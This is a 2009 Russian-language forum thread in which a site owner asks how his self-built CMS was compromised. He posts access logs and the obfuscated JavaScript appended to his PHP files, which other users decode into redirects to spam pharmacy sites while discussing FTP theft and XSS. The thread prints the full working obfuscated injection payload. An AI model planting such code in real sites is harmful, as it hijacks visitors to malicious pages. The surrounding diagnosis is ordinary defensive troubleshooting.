Атаки на сайт.

Страницы: ← Следующая страница →

Z-MODe

Сообщения: 199 Репутация: N Группа: Кто попало
24 июля 2009 г. 4:13
Случилось первый раз, поэтому даже не знаю что и как думать.
Есть сайт, сделанный на своей cms.

В один прекрасный день в него залазит вирус..
После чего получилось несколько отредактированных файлов, который так или иначе инклюдятся к indexу, в конце файлов был дописан код который выводит JS.. чё делает этот ЖС мне не понятно ибо это набор букв и цифр)

Вопрос один, как это могло произойти? Это может быть моим косяком, т.е. моя цмс настолько убогая, что через неё получили доступ к файловой системе? Или всё таки фтп ломанули?
нашёл вот такого подобия логи..

205.209.142.43 - - [14/Jul/2009:16:21:43 +0400] "GET / HTTP/1.0" 200 8036 "-" "Java/1.6.0_13" 205.209.142.43 - - [14/Jul/2009:16:21:56 +0400] "GET / HTTP/1.0" 200 2377 "-" "Java/1.6.0_13" 205.209.142.43 - - [14/Jul/2009:16:21:57 +0400] "GET /en HTTP/1.0" 301 804 "-" "Java/1.6.0_13" 205.209.142.43 - - [14/Jul/2009:16:21:58 +0400] "GET /about_us HTTP/1.0" 200 8036 "-" "Java/1.6.0_13" 205.209.142.43 - - [14/Jul/2009:16:21:59 +0400] "GET /contacts HTTP/1.0" 200 7695 "-" "Java/1.6.0_13" 205.209.142.43 - - [14/Jul/2009:16:21:59 +0400] "GET /dealer HTTP/1.0" 200 8063 "-" "Java/1.6.0_13" 205.209.142.43 - - [14/Jul/2009:16:22:00 +0400] "GET /en/ HTTP/1.0" 200 7976 "-" "Java/1.6.0_13" 205.209.142.43 - - [14/Jul/2009:16:22:00 +0400] "GET /index.html HTTP/1.0" 200 2377 "-" "Java/1.6.0_13" 205.209.142.43 - - [14/Jul/2009:16:22:01 +0400] "GET /ru HTTP/1.0" 301 804 "-" "Java/1.6.0_13" 205.209.142.43 - - [14/Jul/2009:16:22:01 +0400] "GET /eng HTTP/1.0" 302 - "-" "Java/1.6.0_13" 205.209.142.43 - - [14/Jul/2009:16:22:01 +0400] "GET /eng HTTP/1.0" 302 - "-" "Java/1.6.0_13"

http://z-mode.net.ru/went26.rar
та папка в который лежат эти скрипты, после чего сайт в шоке.
md5

Сообщения: 11960 Репутация: N Группа: в ухо

24 июля 2009 г. 9:30, спустя 5 часов 16 минут 17 секунд

скорее фтп ломанули

все умрут, а я изумруд
adw0rd

Сообщения: 22959 Репутация: N Группа: в ухо

24 июля 2009 г. 10:48, спустя 1 час 18 минут 5 секунд

Z-MODe, да, скорее всего фтп. Покажи js-код "последствий вируса".

https://smappi.org/ - платформа по созданию API на все случаи жизни

Z-MODe

Сообщения: 199 Репутация: N Группа: Кто попало

24 июля 2009 г. 13:03, спустя 2 часа 15 минут 8 секунд

<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%297Glxqp%297I%294E%297Glieh%297I%294E%297Gwgvmtx%2964perkyeki%297H%2966NezeWgvmtx525%2966%2964x%7Dti%297H%2966xi%7Cx3nezewgvmtx%2966%297I%294Epsgexmsr2vitpegi%296%3C%2966lxxt%297E33%7B%7B%7B2pmgirwi1tlevqeg%7D2gsq%2966%296%3D%297F%294E%297G3wgvmtx%297I%294E%297G3lieh%297I%294E%297Gfsh%7D%297I%294E%297G3fsh%7D%297I%294E%297G3lxqp%297I4')</script>


<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('*8Hmyrq*8J*5F*8Hmjfi*8J*5F*8Hxhwnuy*75qfslzflj*8I*77Of%7BfXhwnuy636*77*75y%7Euj*8I*77yj%7Dy4of%7Bfxhwnuy*77*8J*5Fqthfynts3wjuqfhj*7%3D*77myyu*8F44%7C%7C%7C3vzfqny%7Eiwzlxhqjfs3htr*77*7%3E*8G*5F*8H4xhwnuy*8J*5F*8H4mjfi*8J*5F*8Hgti%7E*8J*5F*8H4gti%7E*8J*5F*8H4myrq*8J5')</script>

krasun

Сообщения: 1370 Репутация: N Группа: Джедаи

24 июля 2009 г. 13:37, спустя 33 минуты 59 секунд

сделай так document.body.innerHTML = unescape('%3C%73%63%72%69%70%7…..); и покажи результат, так как это вполне понятные символы

krasun

Сообщения: 1370 Репутация: N Группа: Джедаи

24 июля 2009 г. 13:46, спустя 9 минут 10 секунд

твой скрипт создает функцию расшифровки, вот смотри


function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}

которая расшифровывает строку и пишет ее

dF('%297Glxqp%297I%294E%297Glieh%297I%294E%297Gwgvmtx%2964perkyeki%297H%2966NezeWgvmtx525%2966%2964x%7Dti%297H%2966xi%7Cx3nezewgvmtx%2966%297I%294Epsgexmsr2vitpegi%296%3C%2966lxxt%297E33%7B%7B%7B2pmgirwi1tlevqeg%7D2gsq%2966%296%3D%297F%294E%297G3wgvmtx%297I%294E%297G3lieh%297I%294E%297Gfsh%7D%297I%294E%297G3fsh%7D%297I%294E%297G3lxqp%297I4')

после чего он спокойно вызывает записанный код

и вот еще

dF('*8Hmyrq*8J*5F*8Hmjfi*8J*5F*8Hxhwnuy*75qfslzflj*8I*77Of%7BfXhwnuy636*77*75y%7Euj*8I*77yj%7Dy4of%7Bfxhwnuy*77*8J*5Fqthfynts3wjuqfhj*7%3D*77myyu*8F44%7C%7C%7C3vzfqny%7Eiwzlxhqjfs3htr*77*7%3E*8G*5F*8H4xhwnuy*8J*5F*8H4mjfi*8J*5F*8Hgti%7E*8J*5F*8H4gti%7E*8J*5F*8H4myrq*8J5')

Спустя 49 сек.

сейчас расшифрую, скажу что он делает, пару сек

adw0rd

Сообщения: 22959 Репутация: N Группа: в ухо

24 июля 2009 г. 13:47, спустя 39 секунд

сделай так document.body.innerHTML = unescape('%3C%73%63%72%69%70%7…..); и покажи результат, так как это вполне понятные символы

http://pyha.ru/fishki/urlcoder/

https://smappi.org/ - платформа по созданию API на все случаи жизни
krasun

Сообщения: 1370 Репутация: N Группа: Джедаи
24 июля 2009 г. 13:56, спустя 9 минут 26 секунд
вот первый код

location.replace("http://www.license-pharmacy.com");

второй делает аналогичное только с другим адресом
Спустя 127 сек.
в итоге скрипт делает следующее, создает функцию расшифровки dF, которая в свою очередь то, что расшифрует пишет document.write(), а расшифровывает оно всего лишь функции перенаправления на другие страницы, вот и все.
Спустя 238 сек.
такое обычно делают при XSS атаке, а возможно тебя и через FTP ломанули
Sinkler

Сообщения: 7958 Репутация: N Группа: в ухо

24 июля 2009 г. 14:01, спустя 5 минут 6 секунд

krasun, +1, не порекомендуешь к-н литературу про обеспечение безопасности веб-приложений?
krasun

Сообщения: 1370 Репутация: N Группа: Джедаи

24 июля 2009 г. 14:05, спустя 4 минуты 2 секунды

ой, по безопасности веб-приложений даже не знаю, не встречал такое наверное
Спустя 18 сек.
в основном все в книгах урывками пишется
Troy

Сообщения: 2532 Репутация: N Группа: Джедаи

24 июля 2009 г. 14:53, спустя 47 минут 28 секунд

Sinkler, врят ли найдёш , про это я только статьи видел , просто данные фильтруй и будеш счастлив
krasun

Сообщения: 1370 Репутация: N Группа: Джедаи

24 июля 2009 г. 14:54, спустя 48 секунд

Sinkler, врят ли найдёш , про это я только статьи видел , просто данные фильтруй и будеш счастлив

мне кажется тут все гораздо сложнее
Troy

Сообщения: 2532 Репутация: N Группа: Джедаи

24 июля 2009 г. 15:11, спустя 17 минут 27 секунд

krasun, я про SQL иньекции XSS
LIFF

Сообщения: 188 Репутация: N Группа: Адекваты

24 июля 2009 г. 15:41, спустя 30 минут 16 секунд

Sinkler, http://phpsec.org/projects/guide/ - думаю будет полезно почитать.
artoodetoo

Сообщения: 5147 Репутация: N Группа: в ухо

24 июля 2009 г. 17:13, спустя 1 час 31 минуту 38 секунд

планета вопасносте! бойтесь. придет чорный властелин и сделает инъекцию прямо в ваш иксэсэс.

ιιlllιlllι унц-унц

Страницы: ← Следующая страница →

Пожалуйста, авторизуйтесь, чтобы написать комментарий!

Атаки на сайт.

Войти